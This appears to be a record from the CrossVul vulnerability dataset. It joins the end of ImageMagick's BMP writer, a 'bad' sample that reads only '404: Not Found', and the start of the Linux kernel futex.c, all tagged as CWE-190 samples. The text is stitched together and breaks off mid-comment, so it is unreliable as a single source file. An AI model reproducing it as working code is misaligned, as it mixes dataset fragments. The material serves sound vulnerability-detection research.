(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RGB");
break;
}
case BI_RLE8:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_RLE8");
break;
}
case BI_BITFIELDS:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=BI_BITFIELDS");
break;
}
default:
{
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Compression=UNKNOWN (%lu)",bmp_info.compression);
break;
}
}
if (bmp_info.number_colors == 0)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=unspecified");
else
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Number_colors=%lu",bmp_info.number_colors);
}
(void) WriteBlob(image,2,(unsigned char *) "BM");
(void) WriteBlobLSBLong(image,bmp_info.file_size);
(void) WriteBlobLSBLong(image,bmp_info.ba_offset); /* always 0 */
(void) WriteBlobLSBLong(image,bmp_info.offset_bits);
if (type == 2)
{
/*
Write 12-byte version 2 bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.width);
(void) WriteBlobLSBSignedShort(image,(signed short) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
}
else
{
/*
Write 40-byte version 3+ bitmap header.
*/
(void) WriteBlobLSBLong(image,bmp_info.size);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.width);
(void) WriteBlobLSBSignedLong(image,(signed int) bmp_info.height);
(void) WriteBlobLSBShort(image,bmp_info.planes);
(void) WriteBlobLSBShort(image,bmp_info.bits_per_pixel);
(void) WriteBlobLSBLong(image,bmp_info.compression);
(void) WriteBlobLSBLong(image,bmp_info.image_size);
(void) WriteBlobLSBLong(image,bmp_info.x_pixels);
(void) WriteBlobLSBLong(image,bmp_info.y_pixels);
(void) WriteBlobLSBLong(image,bmp_info.number_colors);
(void) WriteBlobLSBLong(image,bmp_info.colors_important);
}
if ((type > 3) && ((image->alpha_trait != UndefinedPixelTrait) ||
(have_color_info != MagickFalse)))
{
/*
Write the rest of the 108-byte BMP Version 4 header.
*/
(void) WriteBlobLSBLong(image,0x00ff0000U); /* Red mask */
(void) WriteBlobLSBLong(image,0x0000ff00U); /* Green mask */
(void) WriteBlobLSBLong(image,0x000000ffU); /* Blue mask */
(void) WriteBlobLSBLong(image,0xff000000U); /* Alpha mask */
(void) WriteBlobLSBLong(image,0x73524742U); /* sRGB */
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.red_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.red_primary.x+
image->chromaticity.red_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.green_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.green_primary.x+
image->chromaticity.green_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.x*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(image->chromaticity.blue_primary.y*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
((1.000f-(image->chromaticity.blue_primary.x+
image->chromaticity.blue_primary.y))*0x40000000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.x*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.y*0x10000));
(void) WriteBlobLSBLong(image,(unsigned int)
(bmp_info.gamma_scale.z*0x10000));
if ((image->rendering_intent != UndefinedIntent) ||
(profile != (StringInfo *) NULL))
{
ssize_t
intent;
switch ((int) image->rendering_intent)
{
case SaturationIntent:
{
intent=LCS_GM_BUSINESS;
break;
}
case RelativeIntent:
{
intent=LCS_GM_GRAPHICS;
break;
}
case PerceptualIntent:
{
intent=LCS_GM_IMAGES;
break;
}
case AbsoluteIntent:
{
intent=LCS_GM_ABS_COLORIMETRIC;
break;
}
default:
{
intent=0;
break;
}
}
(void) WriteBlobLSBLong(image,(unsigned int) intent);
(void) WriteBlobLSBLong(image,0x00); /* dummy profile data */
(void) WriteBlobLSBLong(image,0x00); /* dummy profile length */
(void) WriteBlobLSBLong(image,0x00); /* reserved */
}
}
if (image->storage_class == PseudoClass)
{
unsigned char
*bmp_colormap;
/*
Dump colormap to file.
*/
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Colormap: %.20g entries",(double) image->colors);
bmp_colormap=(unsigned char *) AcquireQuantumMemory((size_t) (1UL <<
bmp_info.bits_per_pixel),4*sizeof(*bmp_colormap));
if (bmp_colormap == (unsigned char *) NULL)
ThrowWriterException(ResourceLimitError,"MemoryAllocationFailed");
q=bmp_colormap;
for (i=0; i < (ssize_t) MagickMin((ssize_t) image->colors,(ssize_t) bmp_info.number_colors); i++)
{
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].blue));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].green));
*q++=ScaleQuantumToChar(ClampToQuantum(image->colormap[i].red));
if (type > 2)
*q++=(unsigned char) 0x0;
}
for ( ; i < (ssize_t) (1UL << bmp_info.bits_per_pixel); i++)
{
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
*q++=(unsigned char) 0x00;
if (type > 2)
*q++=(unsigned char) 0x00;
}
if (type <= 2)
(void) WriteBlob(image,(size_t) (3*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
else
(void) WriteBlob(image,(size_t) (4*(1L << bmp_info.bits_per_pixel)),
bmp_colormap);
bmp_colormap=(unsigned char *) RelinquishMagickMemory(bmp_colormap);
}
if (image->debug != MagickFalse)
(void) LogMagickEvent(CoderEvent,GetMagickModule(),
" Pixels: %lu bytes",bmp_info.image_size);
(void) WriteBlob(image,(size_t) bmp_info.image_size,pixels);
pixel_info=RelinquishVirtualMemory(pixel_info);
if (GetNextImageInList(image) == (Image *) NULL)
break;
image=SyncNextImageInList(image);
status=SetImageProgress(image,SaveImagesTag,scene++,
GetImageListLength(image));
if (status == MagickFalse)
break;
} while (image_info->adjoin != MagickFalse);
(void) CloseBlob(image);
return(MagickTrue);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5223_1 |
crossvul-cpp_data_bad_4015_2 | 404: Not Found | ./CrossVul/dataset_final_sorted/CWE-190/c/bad_4015_2 |
crossvul-cpp_data_good_620_0 | /*
* Fast Userspace Mutexes (which I call "Futexes!").
* (C) Rusty Russell, IBM 2002
*
* Generalized futexes, futex requeueing, misc fixes by Ingo Molnar
* (C) Copyright 2003 Red Hat Inc, All Rights Reserved
*
* Removed page pinning, fix privately mapped COW pages and other cleanups
* (C) Copyright 2003, 2004 Jamie Lokier
*
* Robust futex support started by Ingo Molnar
* (C) Copyright 2006 Red Hat Inc, All Rights Reserved
* Thanks to Thomas Gleixner for suggestions, analysis and fixes.
*
* PI-futex support started by Ingo Molnar and Thomas Gleixner
* Copyright (C) 2006 Red Hat, Inc., Ingo Molnar <mingo@redhat.com>
* Copyright (C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
*
* PRIVATE futexes by Eric Dumazet
* Copyright (C) 2007 Eric Dumazet <dada1@cosmosbay.com>
*
* Requeue-PI support by Darren Hart <dvhltc@us.ibm.com>
* Copyright (C) IBM Corporation, 2009
* Thanks to Thomas Gleixner for conceptual design and careful reviews.
*
* Thanks to Ben LaHaise for yelling "hashed waitqueues" loudly
* enough at me, Linus for the original (flawed) idea, Matthew
* Kirkwood for proof-of-concept implementation.
*
* "The futexes are also cursed."
* "But they come in a choice of three flavours!"
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <linux/slab.h>
#include <linux/poll.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <linux/jhash.h>
#include <linux/init.h>
#include <linux/futex.h>
#include <linux/mount.h>
#include <linux/pagemap.h>
#include <linux/syscalls.h>
#include <linux/signal.h>
#include <linux/export.h>
#include <linux/magic.h>
#include <linux/pid.h>
#include <linux/nsproxy.h>
#include <linux/ptrace.h>
#include <linux/sched/rt.h>
#include <linux/sched/wake_q.h>
#include <linux/sched/mm.h>
#include <linux/hugetlb.h>
#include <linux/freezer.h>
#include <linux/bootmem.h>
#include <linux/fault-inject.h>
#include <asm/futex.h>
#include "locking/rtmutex_common.h"
/*
* READ this before attempting to hack on futexes!
*
* Basic futex operation and ordering guarantees
* =============================================
*
* The waiter reads the futex value in user space and calls
* futex_wait(). This function computes the hash bucket and acquires
* the hash bucket lock. After that it reads the futex user space value
* again and verifies that the data has not changed. If it has not changed
* it enqueues itself into the hash bucket, releases the hash bucket lock
* and schedules.
*
* The waker side modifies the user space value of the futex and calls
* futex_wake(). This function computes the hash bucket and acquires the
* hash bucket lock. Then it looks for waiters on that futex in the hash
* bucket and wakes them.
*
* In futex wake up scenarios where no tasks are blocked on a futex, taking
* the hb spinlock can be avoided and simply return. In order for this
* optimization to work, ordering guarantees must exist so that the waiter
* being added to the list is acknowledged when the list is concurrently being
* checked by the waker, avoiding scenarios like the following:
*
* CPU 0 CPU 1
* val = *futex;
* sys_futex(WAIT, futex, val);
* futex_wait(futex, val);
* uval = *futex;
* *futex = newval;
* sys_futex(WAKE, futex);
* futex_wake(futex);
* if (queue_empty())
* return;
* if (uval == val)
* lock(hash_bucket(futex));
* queue();
* unlock(hash_bucket(futex));
* schedule();
*
* This would cause the waiter on CPU 0 to wait forever because it
* missed the transition of the user space value from val to newval
* and the waker did not find the waiter in the hash bucket queue.
*
* The correct serialization ensures that a waiter either observes
* the changed user space value before blocking or is woken by a
* concurrent waker:
*
* CPU 0 CPU 1
* val = *futex;
* sys_futex(WAIT, futex, val);
* futex_wait(futex, val);
*
* waiters++; (a)
* smp_mb(); (A) <-- paired with -.
* |
* lock(hash_bucket(futex)); |
* |
* uval = *futex; |
* | *futex = newval;
* | sys_futex(WAKE, futex);
* | futex_wake(futex);
* |
* `--------> smp_mb(); (B)
* if (uval == val)
* queue();
* unlock(hash_bucket(futex));
* schedule(); if (waiters)
* lock(hash_bucket(futex));
* else wake_waiters(futex);
* waiters--; (b) unlock(hash_bucket(futex));
*
* Where (A) orders the waiters increment and the futex value read through
* atomic operations (see hb_waiters_inc) and where (B) orders the write
* to futex and the waiters read -- this is done by the barriers for both
* shared and private futexes in get_futex_key_refs().
*
* This yields the following case (where X:=waiters, Y:=futex):
*
* X = Y = 0
*
* w[X]=1 w[Y]=1
* MB MB
* r[Y]=y r[X]=x
*
* Which guarantees that x==0 && y==0 is impossible; which translates back into
* the guarantee that we cannot both miss the futex variable change and the
* enqueue.
*
* Note that a new waiter is accounted for in (a) even when it is possible that
* the wait call can return error, in which case we backtrack from it in (b).
* Refer to the comment in queue_lock().
*
* Similarly, in order to account for waiters being requeued on another
* address we always increment the waiters for the destination bucket before
* acquiring the lock. It then decrements them again after releasing it -
* the code that actually moves the futex(es) between hash buckets (requeue_futex)
* will do the additional required waiter count housekeeping. This is done for
* double_lock_hb() and double_unlock_hb(), respectively.
*/
#ifndef CONFIG_HAVE_FUTEX_CMPXCHG
int __read_mostly futex_cmpxchg_enabled;
#endif
/*
* Futex flags used to encode options to functions and preserve them across
* restarts.
*/
#ifdef CONFIG_MMU
# define FLAGS_SHARED 0x01
#else
/*
* NOMMU does not have per process address space. Let the compiler optimize
* code away.
*/
# define FLAGS_SHARED 0x00
#endif
#define FLAGS_CLOCKRT 0x02
#define FLAGS_HAS_TIMEOUT 0x04
/*
* Priority Inheritance state:
*/
struct futex_pi_state {
/*
* list of 'owned' pi_state instances - these have to be
* cleaned up in do_exit() if the task exits prematurely:
*/
struct list_head list;
/*
* The PI object:
*/
struct rt_mutex pi_mutex;
struct task_struct *owner;
atomic_t refcount;
union futex_key key;
} __randomize_layout;
/**
* struct futex_q - The hashed futex queue entry, one per waiting task
* @list: priority-sorted list of tasks waiting on this futex
* @task: the task waiting on the futex
* @lock_ptr: the hash bucket lock
* @key: the key the futex is hashed on
* @pi_state: optional priority inheritance state
* @rt_waiter: rt_waiter storage for use with requeue_pi
* @requeue_pi_key: the requeue_pi target futex key
* @bitset: bitset for the optional bitmasked wakeup
*
* We use this hashed waitqueue, instead of a normal wait_queue_entry_t, so
* we can wake only the relevant ones (hashed queues may be shared).
*
* A futex_q has a woken state, just like tasks have TASK_RUNNING.
* It is considered woken when plist_node_empty(&q->list) || q->lock_ptr == 0.
* The order of wakeup is always to make the first condition true, then
* the second.
*
* PI futexes are typically woken before they are removed from the hash list via
* the rt_mutex code. See unqueue_me_pi().
*/
struct futex_q {
struct plist_node list;
struct task_struct *task;
spinlock_t *lock_ptr;
union futex_key key;
struct futex_pi_state *pi_state;
struct rt_mutex_waiter *rt_waiter;
union futex_key *requeue_pi_key;
u32 bitset;
} __randomize_layout;
static const struct futex_q futex_q_init = {
/* list gets initialized in queue_me()*/
.key = FUTEX_KEY_INIT,
.bitset = FUTEX_BITSET_MATCH_ANY
};
/*
* Hash buckets are shared by all the futex_keys that hash to the same
* location. Each key may have multiple futex_q structures, one for each task
* waiting on a futex.
*/
struct futex_hash_bucket {
atomic_t waiters;
spinlock_t lock;
struct plist_head chain;
} ____cacheline_aligned_in_smp;
/*
* The base of the bucket array and its size are always used together
* (after initialization only in hash_futex()), so ensure that they
* reside in the same cacheline.
*/
static struct {
struct futex_hash_bucket *queues;
unsigned long hashsize;
} __futex_data __read_mostly __aligned(2*sizeof(long));
#define futex_queues (__futex_data.queues)
#define futex_hashsize (__futex_data.hashsize)
/*
* Fault injections for futexes.
*/
#ifdef CONFIG_FAIL_FUTEX
static struct {
struct fault_attr attr;
bool ignore_private;
} fail_futex = {
.attr = FAULT_ATTR_INITIALIZER,
.ignore_private = false,
};
static int __init setup_fail_futex(char *str)
{
return setup_fault_attr(&fail_futex.attr, str);
}
__setup("fail_futex=", setup_fail_futex);
static bool should_fail_futex(bool fshared)
{
if (fail_futex.ignore_private && !fshared)
return false;
return should_fail(&fail_futex.attr, 1);
}
#ifdef CONFIG_FAULT_INJECTION_DEBUG_FS
static int __init fail_futex_debugfs(void)
{
umode_t mode = S_IFREG | S_IRUSR | S_IWUSR;
struct dentry *dir;
dir = fault_create_debugfs_attr("fail_futex", NULL,
&fail_futex.attr);
if (IS_ERR(dir))
return PTR_ERR(dir);
if (!debugfs_create_bool("ignore-private", mode, dir,
&fail_futex.ignore_private)) {
debugfs_remove_recursive(dir);
return -ENOMEM;
}
return 0;
}
late_initcall(fail_futex_debugfs);
#endif /* CONFIG_FAULT_INJECTION_DEBUG_FS */
#else
static inline bool should_fail_futex(bool fshared)
{
return false;
}
#endif /* CONFIG_FAIL_FUTEX */
static inline void futex_get_mm(union futex_key *key)
{
mmgrab(key->private.mm);
/*
* Ensure futex_get_mm() implies a full barrier such that
* get_futex_key() implies a full barrier. This is relied upon
* as smp_mb(); (B), see the ordering comment above.
*/
smp_mb__after_atomic();
}
/*
* Reflects a new waiter being added to the waitqueue.
*/
static inline void hb_waiters_inc(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
atomic_inc(&hb->waiters);
/*
* Full barrier (A), see the ordering comment above.
*/
smp_mb__after_atomic();
#endif
}
/*
* Reflects a waiter being removed from the waitqueue by wakeup
* paths.
*/
static inline void hb_waiters_dec(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
atomic_dec(&hb->waiters);
#endif
}
static inline int hb_waiters_pending(struct futex_hash_bucket *hb)
{
#ifdef CONFIG_SMP
return atomic_read(&hb->waiters);
#else
return 1;
#endif
}
/**
* hash_futex - Return the hash bucket in the global hash
* @key: Pointer to the futex key for which the hash is calculated
*
* We hash on the keys returned from get_futex_key (see below) and return the
* corresponding hash bucket in the global hash.
*/
static struct futex_hash_bucket *hash_futex(union futex_key *key)
{
u32 hash = jhash2((u32*)&key->both.word,
(sizeof(key->both.word)+sizeof(key->both.ptr))/4,
key->both.offset);
return &futex_queues[hash & (futex_hashsize - 1)];
}
/**
* match_futex - Check whether two futex keys are equal
* @key1: Pointer to key1
* @key2: Pointer to key2
*
* Return 1 if two futex_keys are equal, 0 otherwise.
*/
static inline int match_futex(union futex_key *key1, union futex_key *key2)
{
return (key1 && key2
&& key1->both.word == key2->both.word
&& key1->both.ptr == key2->both.ptr
&& key1->both.offset == key2->both.offset);
}
/*
* Take a reference to the resource addressed by a key.
* Can be called while holding spinlocks.
*
*/
static void get_futex_key_refs(union futex_key *key)
{
if (!key->both.ptr)
return;
/*
* On MMU less systems futexes are always "private" as there is no per
* process address space. We need the smp wmb nevertheless - yes,
* arch/blackfin has MMU less SMP ...
*/
if (!IS_ENABLED(CONFIG_MMU)) {
smp_mb(); /* explicit smp_mb(); (B) */
return;
}
switch (key->both.offset & (FUT_OFF_INODE|FUT_OFF_MMSHARED)) {
case FUT_OFF_INODE:
ihold(key->shared.inode); /* implies smp_mb(); (B) */
break;
case FUT_OFF_MMSHARED:
futex_get_mm(key); /* implies smp_mb(); (B) */
break;
default:
/*
* Private futexes do not hold reference on an inode or
* mm, therefore the only purpose of calling get_futex_key_refs
* is because we need the barrier for the lockless waiter check.
*/
smp_mb(); /* explicit smp_mb(); (B) */
}
}
/*
* Drop a reference to the resource addressed by a key.
* The hash bucket spinlock must not be held. This is
* a no-op for private futexes, see comment in the get
* counterpart.
*/
static void drop_futex_key_refs(union futex_key *key)
{
if (!key->both.ptr) {
/* If we're here then we tried to put a key we failed to get */
WARN_ON_ONCE(1);
return;
}
if (!IS_ENABLED(CONFIG_MMU))
return;
switch (key->both.offset & (FUT_OFF_INODE|FUT_OFF_MMSHARED)) {
case FUT_OFF_INODE:
iput(key->shared.inode);
break;
case FUT_OFF_MMSHARED:
mmdrop(key->private.mm);
break;
}
}
/**
* get_futex_key() - Get parameters which are the keys for a futex
* @uaddr: virtual address of the futex
* @fshared: 0 for a PROCESS_PRIVATE futex, 1 for PROCESS_SHARED
* @key: address where result is stored.
* @rw: mapping needs to be read/write (values: VERIFY_READ,
* VERIFY_WRITE)
*
* Return: a negative error code or 0
*
* The key words are stored in @key on success.
*
* For shared mappings, it's (page->index, file_inode(vma->vm_file),
* offset_within_page). For private mappings, it's (uaddr, current->mm).
* We can usually work out the index without swapping in the page.
*
* lock_page() might sleep, the caller should not hold a spinlock.
*/
static int
get_futex_key(u32 __user *uaddr, int fshared, union futex_key *key, int rw)
{
unsigned long address = (unsigned long)uaddr;
struct mm_struct *mm = current->mm;
struct page *page, *tail;
struct address_space *mapping;
int err, ro = 0;
/*
* The futex address must be "naturally" aligned.
*/
key->both.offset = address % PAGE_SIZE;
if (unlikely((address % sizeof(u32)) != 0))
return -EINVAL;
address -= key->both.offset;
if (unlikely(!access_ok(rw, uaddr, sizeof(u32))))
return -EFAULT;
if (unlikely(should_fail_futex(fshared)))
return -EFAULT;
/*
* PROCESS_PRIVATE futexes are fast.
* As the mm cannot disappear under us and the 'key' only needs
* virtual address, we dont even have to find the underlying vma.
* Note : We do have to check 'uaddr' is a valid user address,
* but access_ok() should be faster than find_vma()
*/
if (!fshared) {
key->private.mm = mm;
key->private.address = address;
get_futex_key_refs(key); /* implies smp_mb(); (B) */
return 0;
}
again:
/* Ignore any VERIFY_READ mapping (futex common case) */
if (unlikely(should_fail_futex(fshared)))
return -EFAULT;
err = get_user_pages_fast(address, 1, 1, &page);
/*
* If write access is not required (eg. FUTEX_WAIT), try
* and get read-only access.
*/
if (err == -EFAULT && rw == VERIFY_READ) {
err = get_user_pages_fast(address, 1, 0, &page);
ro = 1;
}
if (err < 0)
return err;
else
err = 0;
/*
* The treatment of mapping from this point on is critical. The page
* lock protects many things but in this context the page lock
* stabilizes mapping, prevents inode freeing in the shared
* file-backed region case and guards against movement to swap cache.
*
* Strictly speaking the page lock is not needed in all cases being
* considered here and page lock forces unnecessarily serialization
* From this point on, mapping will be re-verified if necessary and
* page lock will be acquired only if it is unavoidable
*
* Mapping checks require the head page for any compound page so the
* head page and mapping is looked up now. For anonymous pages, it
* does not matter if the page splits in the future as the key is
* based on the address. For filesystem-backed pages, the tail is
* required as the index of the page determines the key. For
* base pages, there is no tail page and tail == page.
*/
tail = page;
page = compound_head(page);
mapping = READ_ONCE(page->mapping);
/*
* If page->mapping is NULL, then it cannot be a PageAnon
* page; but it might be the ZERO_PAGE or in the gate area or
* in a special mapping (all cases which we are happy to fail);
* or it may have been a good file page when get_user_pages_fast
* found it, but truncated or holepunched or subjected to
* invalidate_complete_page2 before we got the page lock (also
* cases which we are happy to fail). And we hold a reference,
* so refcount care in invalidate_complete_page's remove_mapping
* prevents drop_caches from setting mapping to NULL beneath us.
*
* The case we do have to guard against is when memory pressure made
* shmem_writepage move it from filecache to swapcache beneath us:
* an unlikely race, but we do need to retry for page->mapping.
*/
if (unlikely(!mapping)) {
int shmem_swizzled;
/*
* Page lock is required to identify which special case above
* applies. If this is really a shmem page then the page lock
* will prevent unexpected transitions.
*/
lock_page(page);
shmem_swizzled = PageSwapCache(page) || page->mapping;
unlock_page(page);
put_page(page);
if (shmem_swizzled)
goto again;
return -EFAULT;
}
/*
* Private mappings are handled in a simple way.
*
* If the futex key is stored on an anonymous page, then the associated
* object is the mm which is implicitly pinned by the calling process.
*
* NOTE: When userspace waits on a MAP_SHARED mapping, even if
* it's a read-only handle, it's expected that futexes attach to
* the object not the particular process.
*/
if (PageAnon(page)) {
/*
* A RO anonymous page will never change and thus doesn't make
* sense for futex operations.
*/
if (unlikely(should_fail_futex(fshared)) || ro) {
err = -EFAULT;
goto out;
}
key->both.offset |= FUT_OFF_MMSHARED; /* ref taken on mm */
key->private.mm = mm;
key->private.address = address;
get_futex_key_refs(key); /* implies smp_mb(); (B) */
} else {
struct inode *inode;
/*
* The associated futex object in this case is the inode and
* the page->mapping must be traversed. Ordinarily this should
* be stabilised under page lock but it's not strictly
* necessary in this case as we just want to pin the inode, not
* update the radix tree or anything like that.
*
* The RCU read lock is taken as the inode is finally freed
* under RCU. If the mapping still matches expectations then the
* mapping->host can be safely accessed as being a valid inode.
*/
rcu_read_lock();
if (READ_ONCE(page->mapping) != mapping) {
rcu_read_unlock();
put_page(page);
goto again;
}
inode = READ_ONCE(mapping->host);
if (!inode) {
rcu_read_unlock();
put_page(page);
goto again;
}
/*
* Take a reference unless it is about to be freed. Previously
* this reference was taken by ihold under the page lock
* pinning the inode in place so i_lock was unnecessary. The
* only way for this check to fail is if the inode was
* truncated in parallel which is almost certainly an
* application bug. In such a case, just retry.
*
* We are not calling into get_futex_key_refs() in file-backed
* cases, therefore a successful atomic_inc return below will
* guarantee that get_futex_key() will still imply smp_mb(); (B).
*/
if (!atomic_inc_not_zero(&inode->i_count)) {
rcu_read_unlock();
put_page(page);
goto again;
}
/* Should be impossible but lets be paranoid for now */
if (WARN_ON_ONCE(inode->i_mapping != mapping)) {
err = -EFAULT;
rcu_read_unlock();
iput(inode);
goto out;
}
key->both.offset |= FUT_OFF_INODE; /* inode-based key */
key->shared.inode = inode;
key->shared.pgoff = basepage_index(tail);
rcu_read_unlock();
}
out:
put_page(page);
return err;
}
static inline void put_futex_key(union futex_key *key)
{
drop_futex_key_refs(key);
}
/**
* fault_in_user_writeable() - Fault in user address and verify RW access
* @uaddr: pointer to faulting user space address
*
* Slow path to fixup the fault we just took in the atomic write
* access to @uaddr.
*
* We have no generic implementation of a non-destructive write to the
* user address. We know that we faulted in the atomic pagefault
* disabled section so we can as well avoid the #PF overhead by
* calling get_user_pages() right away.
*/
static int fault_in_user_writeable(u32 __user *uaddr)
{
struct mm_struct *mm = current->mm;
int ret;
down_read(&mm->mmap_sem);
ret = fixup_user_fault(current, mm, (unsigned long)uaddr,
FAULT_FLAG_WRITE, NULL);
up_read(&mm->mmap_sem);
return ret < 0 ? ret : 0;
}
/**
* futex_top_waiter() - Return the highest priority waiter on a futex
* @hb: the hash bucket the futex_q's reside in
* @key: the futex key (to distinguish it from other futex futex_q's)
*
* Must be called with the hb lock held.
*/
static struct futex_q *futex_top_waiter(struct futex_hash_bucket *hb,
union futex_key *key)
{
struct futex_q *this;
plist_for_each_entry(this, &hb->chain, list) {
if (match_futex(&this->key, key))
return this;
}
return NULL;
}
static int cmpxchg_futex_value_locked(u32 *curval, u32 __user *uaddr,
u32 uval, u32 newval)
{
int ret;
pagefault_disable();
ret = futex_atomic_cmpxchg_inatomic(curval, uaddr, uval, newval);
pagefault_enable();
return ret;
}
static int get_futex_value_locked(u32 *dest, u32 __user *from)
{
int ret;
pagefault_disable();
ret = __get_user(*dest, from);
pagefault_enable();
return ret ? -EFAULT : 0;
}
/*
* PI code:
*/
static int refill_pi_state_cache(void)
{
struct futex_pi_state *pi_state;
if (likely(current->pi_state_cache))
return 0;
pi_state = kzalloc(sizeof(*pi_state), GFP_KERNEL);
if (!pi_state)
return -ENOMEM;
INIT_LIST_HEAD(&pi_state->list);
/* pi_mutex gets initialized later */
pi_state->owner = NULL;
atomic_set(&pi_state->refcount, 1);
pi_state->key = FUTEX_KEY_INIT;
current->pi_state_cache = pi_state;
return 0;
}
static struct futex_pi_state *alloc_pi_state(void)
{
struct futex_pi_state *pi_state = current->pi_state_cache;
WARN_ON(!pi_state);
current->pi_state_cache = NULL;
return pi_state;
}
static void get_pi_state(struct futex_pi_state *pi_state)
{
WARN_ON_ONCE(!atomic_inc_not_zero(&pi_state->refcount));
}
/*
* Drops a reference to the pi_state object and frees or caches it
* when the last reference is gone.
*/
static void put_pi_state(struct futex_pi_state *pi_state)
{
if (!pi_state)
return;
if (!atomic_dec_and_test(&pi_state->refcount))
return;
/*
* If pi_state->owner is NULL, the owner is most probably dying
* and has cleaned up the pi_state already
*/
if (pi_state->owner) {
struct task_struct *owner;
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
owner = pi_state->owner;
if (owner) {
raw_spin_lock(&owner->pi_lock);
list_del_init(&pi_state->list);
raw_spin_unlock(&owner->pi_lock);
}
rt_mutex_proxy_unlock(&pi_state->pi_mutex, owner);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
}
if (current->pi_state_cache) {
kfree(pi_state);
} else {
/*
* pi_state->list is already empty.
* clear pi_state->owner.
* refcount is at 0 - put it back to 1.
*/
pi_state->owner = NULL;
atomic_set(&pi_state->refcount, 1);
current->pi_state_cache = pi_state;
}
}
/*
* Look up the task based on what TID userspace gave us.
* We dont trust it.
*/
static struct task_struct *futex_find_get_task(pid_t pid)
{
struct task_struct *p;
rcu_read_lock();
p = find_task_by_vpid(pid);
if (p)
get_task_struct(p);
rcu_read_unlock();
return p;
}
#ifdef CONFIG_FUTEX_PI
/*
* This task is holding PI mutexes at exit time => bad.
* Kernel cleans up PI-state, but userspace is likely hosed.
* (Robust-futex cleanup is separate and might save the day for userspace.)
*/
void exit_pi_state_list(struct task_struct *curr)
{
struct list_head *next, *head = &curr->pi_state_list;
struct futex_pi_state *pi_state;
struct futex_hash_bucket *hb;
union futex_key key = FUTEX_KEY_INIT;
if (!futex_cmpxchg_enabled)
return;
/*
* We are a ZOMBIE and nobody can enqueue itself on
* pi_state_list anymore, but we have to be careful
* versus waiters unqueueing themselves:
*/
raw_spin_lock_irq(&curr->pi_lock);
while (!list_empty(head)) {
next = head->next;
pi_state = list_entry(next, struct futex_pi_state, list);
key = pi_state->key;
hb = hash_futex(&key);
/*
* We can race against put_pi_state() removing itself from the
* list (a waiter going away). put_pi_state() will first
* decrement the reference count and then modify the list, so
* its possible to see the list entry but fail this reference
* acquire.
*
* In that case; drop the locks to let put_pi_state() make
* progress and retry the loop.
*/
if (!atomic_inc_not_zero(&pi_state->refcount)) {
raw_spin_unlock_irq(&curr->pi_lock);
cpu_relax();
raw_spin_lock_irq(&curr->pi_lock);
continue;
}
raw_spin_unlock_irq(&curr->pi_lock);
spin_lock(&hb->lock);
raw_spin_lock_irq(&pi_state->pi_mutex.wait_lock);
raw_spin_lock(&curr->pi_lock);
/*
* We dropped the pi-lock, so re-check whether this
* task still owns the PI-state:
*/
if (head->next != next) {
/* retain curr->pi_lock for the loop invariant */
raw_spin_unlock(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
put_pi_state(pi_state);
continue;
}
WARN_ON(pi_state->owner != curr);
WARN_ON(list_empty(&pi_state->list));
list_del_init(&pi_state->list);
pi_state->owner = NULL;
raw_spin_unlock(&curr->pi_lock);
raw_spin_unlock_irq(&pi_state->pi_mutex.wait_lock);
spin_unlock(&hb->lock);
rt_mutex_futex_unlock(&pi_state->pi_mutex);
put_pi_state(pi_state);
raw_spin_lock_irq(&curr->pi_lock);
}
raw_spin_unlock_irq(&curr->pi_lock);
}
#endif
/*
* We need to check the following states:
*
* Waiter | pi_state | pi->owner | uTID | uODIED | ?
*
* [1] NULL | --- | --- | 0 | 0/1 | Valid
* [2] NULL | --- | --- | >0 | 0/1 | Valid
*
* [3] Found | NULL | -- | Any | 0/1 | Invalid
*
* [4] Found | Found | NULL | 0 | 1 | Valid
* [5] Found | Found | NULL | >0 | 1 | Invalid
*
* [6] Found | Found | task | 0 | 1 | Valid
*
